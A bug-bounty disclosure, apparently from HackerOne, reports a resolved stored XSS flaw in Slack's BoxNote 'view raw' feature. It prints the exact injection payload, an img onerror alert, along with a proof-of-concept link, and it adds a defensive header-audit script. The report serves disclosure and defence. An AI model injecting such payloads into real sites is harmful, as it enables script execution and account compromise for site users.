
A stored XSS issue in https://files.slack.com

Slack
Reported by securitythinker

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Generic
When making a BoxNote snippet with this XSS payload:

XSS") ;</script> <img src="<img src=search"/onerror=alert(document.domain)//"> "><marquee>

When the snippet is made and "view raw" is used, the XSS payload will be executed.

My example link where the XSS payload executed: https://files.slack.com/files-pri/T027N7MK3-F1NCA92JF/XSS______script___img_src___img_src_search__onerror_alert__Xss__________marquee__boxnote.boxnote

That link will be executed for the entire team's members, which could probably be used in exploitation.
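
A defender-side check for the class of issue reported above, as an added example that is not part of the original report and not Slack's code: it audits the response headers of a "view raw" endpoint for user-uploaded files and reports whether a browser could render the body as script-capable markup. The report does not say how the issue was fixed; the header baseline, the function name auditRawResponse and the sample headers are assumptions made for illustration.

```javascript
// Added example (not Slack's code): audit "view raw" response headers for user files.
const ACTIVE_TYPES = new Set([
  "text/html", "application/xhtml+xml", "image/svg+xml", "text/xml", "application/xml",
]);

// "text/HTML; charset=utf-8" -> "text/html"; a missing header -> ""
function mediaType(value) {
  return (value || "").split(";")[0].trim().toLowerCase();
}

function auditRawResponse(headers) {
  const h = {}; // header names are case-insensitive, so normalise them
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);

  const type = mediaType(h["content-type"]);
  const nosniff = (h["x-content-type-options"] || "").trim().toLowerCase() === "nosniff";
  const attachment = /^\s*attachment\b/i.test(h["content-disposition"] || "");
  // A CSP "sandbox" directive blocks script unless it carries allow-scripts.
  const sb = /(^|;)\s*sandbox\b([^;]*)/i.exec(h["content-security-policy"] || "");
  const sandboxed = sb !== null && !/\ballow-scripts\b/i.test(sb[2]);

  const findings = [];
  if (ACTIVE_TYPES.has(type)) findings.push(`active content type: ${type}`);
  if (type === "") findings.push("no Content-Type: browser may sniff the body as HTML");
  if (!nosniff) findings.push("missing X-Content-Type-Options: nosniff");
  if (!attachment) findings.push("not served as an attachment");
  if (!sandboxed) findings.push("no script-blocking CSP sandbox");

  // The body can run script in the serving origin only if it is rendered inline,
  // as markup, and without a sandbox. A missing type is treated conservatively.
  const asMarkup = ACTIVE_TYPES.has(type) || type === "";
  return { scriptable: asMarkup && !attachment && !sandboxed, findings };
}

// Constructed sample responses (not captured from any real service).
const SAMPLES = {
  weak: { "Content-Type": "text/html; charset=utf-8" },
  hardened: {
    "content-type": "text/plain; charset=utf-8",
    "x-content-type-options": "nosniff",
    "content-disposition": 'attachment; filename="note.boxnote"',
    "content-security-policy": "default-src 'none'; sandbox",
  },
};

for (const [name, hdrs] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(auditRawResponse(hdrs)));
}
```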

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$500.00

Submitted

Weakness

Cross-site Scripting (XSS) - Generic